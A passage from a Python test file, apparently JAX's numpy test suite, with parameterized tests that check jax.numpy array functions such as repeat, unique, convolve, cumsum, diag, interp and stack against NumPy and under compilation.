for axis in [None] + list(range(-len(shape), max(1, len(shape))))
for fixed_size in [True, False]))
def testRepeat(self, axis, shape, dtype, repeats, fixed_size):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.repeat(arg, repeats=repeats, axis=axis)
np_fun = _promote_like_jnp(np_fun)
if fixed_size:
total_repeat_length = np.repeat(np.zeros(shape), repeats, axis).shape[axis or 0]
jnp_fun = lambda arg, rep: jnp.repeat(arg, repeats=rep, axis=axis,
total_repeat_length=total_repeat_length)
jnp_args_maker = lambda: [rng(shape, dtype), repeats]
clo_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis,
total_repeat_length=total_repeat_length)
clo_fun_args_maker = lambda: [rng(shape, dtype)]
self._CompileAndCheck(jnp_fun, jnp_args_maker)
self._CheckAgainstNumpy(np_fun, clo_fun, clo_fun_args_maker)
else:
# Now repeats is in a closure, so a constant.
jnp_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testRepeatScalarFastPath(self):
a = jnp.array([1,2,3,4])
f = lambda a: jnp.repeat(a, repeats=2)
jaxpr = api.make_jaxpr(f)(a)
self.assertLessEqual(len(jaxpr.jaxpr.eqns), 6)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_ind={}_inv={}_count={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis,
return_index, return_inverse, return_counts),
"shape": shape, "dtype": dtype, "axis": axis,
"return_index": return_index, "return_inverse": return_inverse,
"return_counts": return_counts}
for dtype in number_dtypes
for shape in all_shapes
for axis in [None] + list(range(len(shape)))
for return_index in [False, True]
for return_inverse in [False, True]
for return_counts in [False, True]))
def testUnique(self, shape, dtype, axis, return_index, return_inverse, return_counts):
if axis is not None and numpy_version < (1, 19) and np.empty(shape).size == 0:
self.skipTest("zero-sized axis in unique leads to error in older numpy.")
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
np_fun = lambda x: np.unique(x, return_index, return_inverse, return_counts, axis=axis)
jnp_fun = lambda x: jnp.unique(x, return_index, return_inverse, return_counts, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_size={}".format(
jtu.format_shape_dtype_string(shape, dtype), size),
"shape": shape, "dtype": dtype, "size": size}
for dtype in number_dtypes
for size in [1, 5, 10]
for shape in nonempty_array_shapes))
def testUniqueSize(self, shape, dtype, size):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
kwds = dict(return_index=True, return_inverse=True, return_counts=True)
def np_fun(x):
u, ind, inv, counts = jnp.unique(x, **kwds)
if size <= len(u):
u, ind, counts = u[:size], ind[:size], counts[:size]
else:
extra = size - len(u)
u = np.concatenate([u, np.full(extra, u[0], u.dtype)])
ind = np.concatenate([ind, np.full(extra, ind[0], ind.dtype)])
counts = np.concatenate([counts, np.zeros(extra, counts.dtype)])
return u, ind, inv, counts
jnp_fun = lambda x: jnp.unique(x, size=size, **kwds)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_fixed_size={}".format(fixed_size),
"fixed_size": fixed_size}
for fixed_size in [True, False]))
def testNonScalarRepeats(self, fixed_size):
'''
Following numpy test suite from `test_repeat` at
https://github.com/numpy/numpy/blob/main/numpy/core/tests/test_multiarray.py
'''
tol = 1e-5
def test_single(m, args_maker, repeats, axis):
lax_ans = jnp.repeat(m, repeats, axis)
numpy_ans = np.repeat(m, repeats, axis)
self.assertAllClose(lax_ans, numpy_ans, rtol=tol, atol=tol)
if fixed_size:
# Calculate expected size of the repeated axis.
rep_length = np.repeat(np.zeros_like(m), repeats, axis).shape[axis or 0]
jnp_fun = lambda arg, rep: jnp.repeat(
arg, repeats=rep, axis=axis, total_repeat_length=rep_length)
else:
jnp_fun = lambda arg: jnp.repeat(arg, repeats = repeats, axis=axis)
self._CompileAndCheck(jnp_fun, args_maker)
m = jnp.array([1,2,3,4,5,6])
if fixed_size:
args_maker = lambda: [m, repeats]
else:
args_maker = lambda: [m]
for repeats in [2, jnp.array([1,3,0,1,1,2]), jnp.array([1,3,2,1,1,2]), jnp.array([2])]:
test_single(m, args_maker, repeats, axis=None)
test_single(m, args_maker, repeats, axis=0)
m_rect = m.reshape((2,3))
if fixed_size:
args_maker = lambda: [m_rect, repeats]
else:
args_maker = lambda: [m_rect]
for repeats in [2, jnp.array([2,1]), jnp.array([2])]:
test_single(m_rect, args_maker, repeats, axis=0)
for repeats in [2, jnp.array([1,3,2]), jnp.array([2])]:
test_single(m_rect, args_maker, repeats, axis=1)
def testIssue2330(self):
'''
Make sure return value of jnp.concatenate is a jax.ndarray and is side-effect save
'''
def attempt_sideeffect(x):
x = [x]
x = jnp.concatenate(x)
x -= 1.
return x
np_input = np.ones((1))
jnp_input = jnp.ones((1))
expected_np_input_after_call = np.ones((1))
expected_jnp_input_after_call = jnp.ones((1))
self.assertTrue(xla.type_is_device_array(jnp.concatenate([np_input])))
attempt_sideeffect(np_input)
attempt_sideeffect(jnp_input)
self.assertAllClose(np_input, expected_np_input_after_call)
self.assertAllClose(jnp_input, expected_jnp_input_after_call)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_xshape=[{}]_yshape=[{}]_mode={}".format(
op,
jtu.format_shape_dtype_string(xshape, dtype),
jtu.format_shape_dtype_string(yshape, dtype),
mode),
"xshape": xshape, "yshape": yshape, "dtype": dtype, "mode": mode,
"jnp_op": getattr(jnp, op),
"np_op": getattr(np, op)}
for mode in ['full', 'same', 'valid']
for op in ['convolve', 'correlate']
for dtype in number_dtypes
for xshape in one_dim_array_shapes
for yshape in one_dim_array_shapes))
def testConvolutions(self, xshape, yshape, dtype, mode, jnp_op, np_op):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(xshape, dtype), rng(yshape, dtype)]
precision = lax.Precision.HIGHEST if jtu.device_under_test() == "tpu" else None
np_fun = partial(np_op, mode=mode)
jnp_fun = partial(jnp_op, mode=mode, precision=precision)
tol = {np.float16: 2e-1, np.float32: 1e-2, np.float64: 1e-14,
np.complex128: 1e-14}
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), axis,
out_dtype.__name__),
"axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
for op in ["cumsum", "cumprod"]
for dtype in all_dtypes
for out_dtype in default_dtypes
for shape in all_shapes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np_op(arg, axis=axis, dtype=out_dtype)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = lambda arg: jnp_op(arg, axis=axis, dtype=out_dtype)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_thresholds = {dtypes.bfloat16: 4e-2}
tol = max(jtu.tolerance(dtype, tol_thresholds),
jtu.tolerance(out_dtype, tol_thresholds))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), axis,
out_dtype.__name__),
"axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
for op in ["nancumsum", "nancumprod"]
for dtype in all_dtypes
for out_dtype in default_dtypes
for shape in all_shapes
for axis in [None] + list(range(-len(shape), len(shape)))))
def testNanCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
rng = jtu.rand_some_nan(self.rng())
np_fun = partial(np_op, axis=axis, dtype=out_dtype)
np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
jnp_fun = partial(jnp_op, axis=axis, dtype=out_dtype)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_thresholds = {dtypes.bfloat16: 4e-2}
tol = max(jtu.tolerance(dtype, tol_thresholds),
jtu.tolerance(out_dtype, tol_thresholds))
if dtype != jnp.bfloat16:
# numpy functions do not properly handle bfloat16
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_yshape={}_xshape={}_dx={}_axis={}".format(
jtu.format_shape_dtype_string(yshape, dtype),
jtu.format_shape_dtype_string(xshape, dtype) if xshape is not None else None,
dx, axis),
"yshape": yshape, "xshape": xshape, "dtype": dtype, "dx": dx, "axis": axis}
for dtype in default_dtypes
for yshape, xshape, dx, axis in [
((10,), None, 1.0, -1),
((3, 10), None, 2.0, -1),
((3, 10), None, 3.0, -0),
((10, 3), (10,), 1.0, -2),
((3, 10), (10,), 1.0, -1),
((3, 10), (3, 10), 1.0, -1),
((2, 3, 10), (3, 10), 1.0, -2),
]))
@jtu.skip_on_devices("tpu") # TODO(jakevdp): fix and reenable this test.
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testTrapz(self, yshape, xshape, dtype, dx, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(yshape, dtype), rng(xshape, dtype) if xshape is not None else None]
np_fun = partial(np.trapz, dx=dx, axis=axis)
jnp_fun = partial(jnp.trapz, dx=dx, axis=axis)
tol = jtu.tolerance(dtype, {np.float64: 1e-12,
dtypes.bfloat16: 4e-2})
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol,
check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol,
check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_dtype={}_m={}_n={}_k={}".format(
np.dtype(dtype).name, m, n, k),
"m": m, "n": n, "k": k, "dtype": dtype}
for dtype in default_dtypes
for n in [0, 4]
for m in [None, 0, 1, 3, 4]
for k in list(range(-4, 4))))
def testTri(self, m, n, k, dtype):
np_fun = lambda: np.tri(n, M=m, k=k, dtype=dtype)
jnp_fun = lambda: jnp.tri(n, M=m, k=k, dtype=dtype)
args_maker = lambda: []
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_shape={}_k={}".format(
op, jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "op": op, "k": k}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for op in ["tril", "triu"]
for k in list(range(-3, 3))))
def testTriLU(self, dtype, shape, op, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: getattr(np, op)(arg, k=k)
jnp_fun = lambda arg: getattr(jnp, op)(arg, k=k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "n={}_k={}_m={}".format(n, k, m),
"n": n, "k": k, "m": m}
for n in range(1, 5)
for k in [-1, 0, 1]
for m in range(1, 5)))
def testTrilIndices(self, n, k, m):
np_fun = lambda n, k, m: np.tril_indices(n, k=k, m=m)
jnp_fun = lambda n, k, m: jnp.tril_indices(n, k=k, m=m)
args_maker = lambda: [n, k, m]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "n={}_k={}_m={}".format(n, k, m),
"n": n, "k": k, "m": m}
for n in range(1, 5)
for k in [-1, 0, 1]
for m in range(1, 5)))
def testTriuIndices(self, n, k, m):
np_fun = lambda n, k, m: np.triu_indices(n, k=k, m=m)
jnp_fun = lambda n, k, m: jnp.triu_indices(n, k=k, m=m)
args_maker = lambda: [n, k, m]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
for k in [-1, 0, 1]))
def testTriuIndicesFrom(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arr, k: np.triu_indices_from(arr, k=k)
jnp_fun = lambda arr, k: jnp.triu_indices_from(arr, k=k)
args_maker = lambda: [rng(shape, dtype), k]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
for k in [-1, 0, 1]))
def testTrilIndicesFrom(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arr, k: np.tril_indices_from(arr, k=k)
jnp_fun = lambda arr, k: jnp.tril_indices_from(arr, k=k)
args_maker = lambda: [rng(shape, dtype), k]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ndim={}_n={}".format(ndim, n),
"ndim": ndim, "n": n}
for ndim in [0, 1, 4]
for n in [0, 1, 7]))
def testDiagIndices(self, ndim, n):
np.testing.assert_equal(np.diag_indices(n, ndim),
jnp.diag_indices(n, ndim))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "arr_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)
),
"dtype": dtype, "shape": shape}
for dtype in default_dtypes
for shape in [(1,1), (2,2), (3,3), (4,4), (5,5)]))
def testDiagIndicesFrom(self, dtype, shape):
rng = jtu.rand_default(self.rng())
np_fun = np.diag_indices_from
jnp_fun = jnp.diag_indices_from
args_maker = lambda : [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) in (1, 2)]
for k in list(range(-4, 4))))
def testDiag(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.diag(arg, k)
jnp_fun = lambda arg: jnp.diag(arg, k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_k={}".format(
jtu.format_shape_dtype_string(shape, dtype), k),
"dtype": dtype, "shape": shape, "k": k}
for dtype in default_dtypes
for shape in all_shapes
for k in range(-4, 4)))
def testDiagFlat(self, shape, dtype, k):
rng = jtu.rand_default(self.rng())
# numpy has inconsistencies for scalar values
# https://github.com/numpy/numpy/issues/16477
# jax differs in that it treats scalars values as length-1 arrays
np_fun = lambda arg: np.diagflat(np.atleast_1d(arg), k)
jnp_fun = lambda arg: jnp.diagflat(arg, k)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_a1_shape={}_a2_shape2={}".format(
jtu.format_shape_dtype_string(a1_shape, dtype),
jtu.format_shape_dtype_string(a2_shape, dtype)),
"dtype": dtype, "a1_shape": a1_shape, "a2_shape": a2_shape}
for dtype in default_dtypes
for a1_shape in one_dim_array_shapes
for a2_shape in one_dim_array_shapes))
def testPolyMul(self, a1_shape, a2_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg1, arg2: np.polymul(arg1, arg2)
jnp_fun_np = lambda arg1, arg2: jnp.polymul(arg1, arg2, trim_leading_zeros=True)
jnp_fun_co = lambda arg1, arg2: jnp.polymul(arg1, arg2)
args_maker = lambda: [rng(a1_shape, dtype), rng(a2_shape, dtype)]
tol = {np.float16: 2e-1, np.float32: 5e-2, np.float64: 1e-13}
self._CheckAgainstNumpy(np_fun, jnp_fun_np, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun_co, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_offset={}_axis1={}_axis2={}".format(
jtu.format_shape_dtype_string(shape, dtype), offset, axis1, axis2),
"dtype": dtype, "shape": shape, "offset": offset, "axis1": axis1,
"axis2": axis2}
for dtype in default_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for axis1 in range(-len(shape), len(shape))
for axis2 in [a for a in range(-len(shape), len(shape))
if a % len(shape) != axis1 % len(shape)]
for offset in list(range(-4, 4))))
def testDiagonal(self, shape, dtype, offset, axis1, axis2):
rng = jtu.rand_default(self.rng())
np_fun = lambda arg: np.diagonal(arg, offset, axis1, axis2)
jnp_fun = lambda arg: jnp.diagonal(arg, offset, axis1, axis2)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_n={}".format(np.dtype(dtype).name, n),
"dtype": dtype, "n": n}
for dtype in default_dtypes
for n in list(range(4))))
def testIdentity(self, n, dtype):
np_fun = lambda: np.identity(n, dtype)
jnp_fun = lambda: jnp.identity(n, dtype)
args_maker = lambda: []
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_period={}_left={}_right={}".format(
jtu.format_shape_dtype_string(shape, dtype), period, left, right),
"shape": shape, "dtype": dtype,
"period": period, "left": left, "right": right}
for shape in nonempty_shapes
for period in [None, 0.59]
for left in [None, 0]
for right in [None, 1]
for dtype in default_dtypes
# following types lack precision for meaningful tests
if dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16]
))
def testInterp(self, shape, dtype, period, left, right):
rng = jtu.rand_default(self.rng(), scale=10)
kwds = dict(period=period, left=left, right=right)
np_fun = partial(np.interp, **kwds)
jnp_fun = partial(jnp.interp, **kwds)
args_maker = lambda: [rng(shape, dtype), np.sort(rng((20,), dtype)), np.linspace(0, 1, 20)]
# skip numpy comparison for integer types with period specified, because numpy
# uses an unstable sort and so results differ for duplicate values.
if not (period and np.issubdtype(dtype, np.integer)):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol={np.float32: 2E-4})
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x1={}_x2={}_x1_rng={}".format(
jtu.format_shape_dtype_string(x1_shape, x1_dtype),
jtu.format_shape_dtype_string(x2_shape, np.int32),
x1_rng_factory_id),
"x1_shape": x1_shape, "x1_dtype": x1_dtype,
"x2_shape": x2_shape, "x1_rng_factory": x1_rng_factory,
"x2_rng_factory": x2_rng_factory}
for x1_rng_factory_id, x1_rng_factory in
enumerate([jtu.rand_some_inf_and_nan, jtu.rand_some_zero])
for x2_rng_factory in [partial(jtu.rand_int, low=-1075, high=1024)]
for x1_shape, x2_shape in filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(array_shapes, 2))
for x1_dtype in default_dtypes))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLdexp(self, x1_shape, x1_dtype, x2_shape, x1_rng_factory, x2_rng_factory):
# integer types are converted to float64 in numpy's implementation
if (x1_dtype not in [jnp.bfloat16, np.float16, np.float32]
and not config.x64_enabled):
self.skipTest("Only run float64 testcase when float64 is enabled.")
x1_rng = x1_rng_factory(self.rng())
x2_rng = x2_rng_factory(self.rng())
np_fun = lambda x1, x2: np.ldexp(x1, x2)
np_fun = jtu.ignore_warning(category=RuntimeWarning,
message="overflow.*")(np_fun)
jnp_fun = lambda x1, x2: jnp.ldexp(x1, x2)
args_maker = lambda: [x1_rng(x1_shape, x1_dtype),
x2_rng(x2_shape, np.int32)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_rng_factory={}".format(
jtu.format_shape_dtype_string(shape, dtype), rng_factory_id),
"shape": shape, "dtype": dtype, "rng_factory": rng_factory}
for rng_factory_id, rng_factory in enumerate([
jtu.rand_some_inf_and_nan,
jtu.rand_some_zero,
partial(jtu.rand_not_small, offset=1e8),
])
for shape in all_shapes
for dtype in default_dtypes))
def testFrexp(self, shape, dtype, rng_factory):
# integer types are converted to float64 in numpy's implementation
if (dtype not in [jnp.bfloat16, np.float16, np.float32]
and not config.x64_enabled):
self.skipTest("Only run float64 testcase when float64 is enabled.")
rng = rng_factory(self.rng())
np_fun = lambda x: np.frexp(x)
jnp_fun = lambda x: jnp.frexp(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=np.issubdtype(dtype, np.inexact))
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_dtype_{}_offset={}_axis1={}_axis2={}".format(
jtu.format_shape_dtype_string(shape, dtype),
out_dtype, offset, axis1, axis2),
"dtype": dtype, "out_dtype": out_dtype, "shape": shape, "offset": offset,
"axis1": axis1, "axis2": axis2}
for dtype in default_dtypes
for out_dtype in [None] + number_dtypes
for shape in [shape for shape in all_shapes if len(shape) >= 2]
for axis1 in range(-len(shape), len(shape))
for axis2 in range(-len(shape), len(shape))
if (axis1 % len(shape)) != (axis2 % len(shape))
for offset in list(range(-4, 4))))
def testTrace(self, shape, dtype, out_dtype, offset, axis1, axis2):
rng = jtu.rand_default(self.rng())
def np_fun(arg):
if out_dtype == jnp.bfloat16:
return np.trace(arg, offset, axis1, axis2, np.float32).astype(jnp.bfloat16)
else:
return np.trace(arg, offset, axis1, axis2, out_dtype)
jnp_fun = lambda arg: jnp.trace(arg, offset, axis1, axis2, out_dtype)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_a={}_v={}_side={}".format(
jtu.format_shape_dtype_string(ashape, dtype),
jtu.format_shape_dtype_string(vshape, dtype),
side), "ashape": ashape, "vshape": vshape, "side": side,
"dtype": dtype}
for ashape in [(15,), (16,), (17,)]
for vshape in [(), (5,), (5, 5)]
for side in ['left', 'right']
for dtype in default_dtypes
))
def testSearchsorted(self, ashape, vshape, side, dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [np.sort(rng(ashape, dtype)), rng(vshape, dtype)]
np_fun = lambda a, v: np.searchsorted(a, v, side=side)
jnp_fun = lambda a, v: jnp.searchsorted(a, v, side=side)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_bins={}_right={}_reverse={}".format(
jtu.format_shape_dtype_string(xshape, dtype),
jtu.format_shape_dtype_string(binshape, dtype),
right, reverse), "xshape": xshape, "binshape": binshape,
"right": right, "reverse": reverse, "dtype": dtype}
for xshape in [(20,), (5, 4)]
for binshape in [(1,), (5,)]
for right in [True, False]
for reverse in [True, False]
for dtype in default_dtypes
))
def testDigitize(self, xshape, binshape, right, reverse, dtype):
order = jax.ops.index[::-1] if reverse else jax.ops.index[:]
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(xshape, dtype), jnp.sort(rng(binshape, dtype))[order]]
np_fun = lambda x, bins: np.digitize(x, bins, right=right)
jnp_fun = lambda x, bins: jnp.digitize(x, bins, right=right)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_array={}".format(
jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
"shape": shape, "dtypes": dtypes, "array_input": array_input}
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 5)]
for array_input in [True, False]))
def testColumnStack(self, shape, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(np.column_stack)
jnp_fun = jnp.column_stack
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_array={}".format(
jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), axis, array_input),
"shape": shape, "axis": axis, "dtypes": dtypes, "array_input": array_input}
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 100)]
for axis in range(-len(shape), len(shape) + 1)
for array_input in [True, False]))
def testStack(self, shape, axis, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(partial(np.stack, axis=axis))
jnp_fun = partial(jnp.stack, axis=axis)
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_{}_array={}".format(
op, jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
"shape": shape, "op": op, "dtypes": dtypes, "array_input": array_input}
for op in ["hstack", "vstack", "dstack"]
for dtypes in [
[np.float32],
[np.float32, np.float32],
[np.float32, np.int32, np.float32],
[np.float32, np.int64, np.float32],
[np.float32, np.int32, np.float64],
]
for shape in [(), (2,), (3, 4), (1, 100), (2, 3, 4)]
for array_input in [True, False]))
def testHVDStack(self, shape, op, dtypes, array_input):
rng = jtu.rand_default(self.rng())
if array_input:
args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
else:
args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
np_fun = _promote_like_jnp(getattr(np, op))
jnp_fun = getattr(jnp, op)
self._CheckAgainstNumpy(jnp_fun, np_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outdtype={}_fillshape={}".format(
jtu.format_shape_dtype_string(shape, fill_value_dtype),
np.dtype(out_dtype).name if out_dtype else "None",
fill_value_shape),
"fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
"shape": shape, "out_dtype": out_dtype}
for shape in array_shapes + [3, np.array(7, dtype=np.int32)]
for fill_value_dtype in default_dtypes
for fill_value_shape in _compatible_shapes(shape)
for out_dtype in [None] + default_dtypes))
def testFull(self, shape, fill_value_dtype, fill_value_shape, out_dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda fill_value: np.full(shape, fill_value, dtype=out_dtype)
jnp_fun = lambda fill_value: jnp.full(shape, fill_value, dtype=out_dtype)
args_maker = lambda: [rng(fill_value_shape, fill_value_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_shape={}_n={}_axis={}_prepend={}_append={}".format(
jtu.format_shape_dtype_string(shape, dtype),
n, axis, prepend, append),
"shape": shape, "dtype": dtype, "n": n, "axis": axis,
"prepend": prepend, "append": append
} for shape, dtype in s(_shape_and_dtypes(nonempty_nonscalar_array_shapes, default_dtypes))
for n in s([0, 1, 2])
for axis in s(list(range(-len(shape), max(1, len(shape)))))
for prepend in s([None, 1, np.zeros(shape, dtype=dtype)])
for append in s([None, 1, np.zeros(shape, dtype=dtype)])
)))
def testDiff(self, shape, dtype, n, axis, prepend, append):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
def np_fun(x, n=n, axis=axis, prepend=prepend, append=append):
if prepend is None:
prepend = np._NoValue
elif not np.isscalar(prepend) and prepend.dtype == jnp.bfloat16:
